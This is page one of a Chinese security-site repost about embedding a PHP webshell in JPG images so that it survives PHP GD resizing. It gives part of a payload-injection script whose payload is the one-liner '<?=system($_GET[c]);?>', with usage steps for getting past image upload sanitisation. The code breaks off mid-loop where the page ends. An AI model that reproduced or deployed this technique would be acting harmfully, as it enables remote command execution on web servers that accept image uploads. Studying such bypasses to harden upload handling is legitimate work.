欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

突破php 的imagecopyresampled 和imagecopyresized 实现图片马 JPG

来源:wooyun 作者:livers (如梦似幻) 时间:2013-07-27 TAG: 我要投稿

 之前有人发布了 利用PNG 图片上述压缩函数的方法 原理利用 

PNG的结构IDAT chunks填充一句话webshell,并进行一套取模运算  详见: 
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ 
 
但是受限于  图像的尺寸 必须320×320 且必须是PNG格式 
 
 
 
那JPG怎么办 
 
神奇的老外 提出了列方法 
 
 
<?php 
        /* 
 
        The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations 
        caused by PHP functions imagecopyresized() and imagecopyresampled(). 
        It is necessary that the size and quality of the initial image are the same as those of the processed 
        image. 
 
        1) Upload an arbitrary image via secured files upload script 
        2) Save the processed image and launch: 
        php jpg_payload.php <jpg_name.jpg> 
 
        In case of successful injection you will get a specially crafted image, which should be uploaded again. 
 
        Since the most straightforward injection method is used, the following problems can occur: 
        1) After the second processing the injected data may become partially corrupted. 
        2) The jpg_payload.php script outputs "Something's wrong". 
        If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another 
        initial image. 
 
        Sergey Bobrov @Black2Fan. 
 
        See also: 
        https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ 
 
        */ 
 
        $miniPayload = '<?=system($_GET[c]);?>'; 
 
        if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) { 
        die('php-gd is not installed'); 
        } 
       
        if(!isset($argv[1])) { 
                die('php jpg_payload.php <jpg_name.jpg>'); 
        } 
 
        set_error_handler("custom_error_handler"); 
 
        for($pad = 0; $pad < 1024; $pad++) { 
                $nullbytePayloadSize = $pad; 
                $dis = new DataInputStream($argv[1]); 
                $outStream = file_get_contents($argv[1]); 
                $extraBytes = 0; 
                $correctImage = TRUE; 
 
                if($dis->readShort() != 0xFFD8) { 
                        die('Incorrect SOI marker'); 
                } 
 
                while((!$dis->eof()) && ($dis->readByte() == 0xFF)) { 
                        $marker = $dis->readByte(); 
                        $size = $dis->readShort() - 2; 
                        $dis->skip($size); 
                        if($marker === 0xDA) { 
                                $startPos = $dis->seek(); 
                                $outStreamTmp = 

[1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载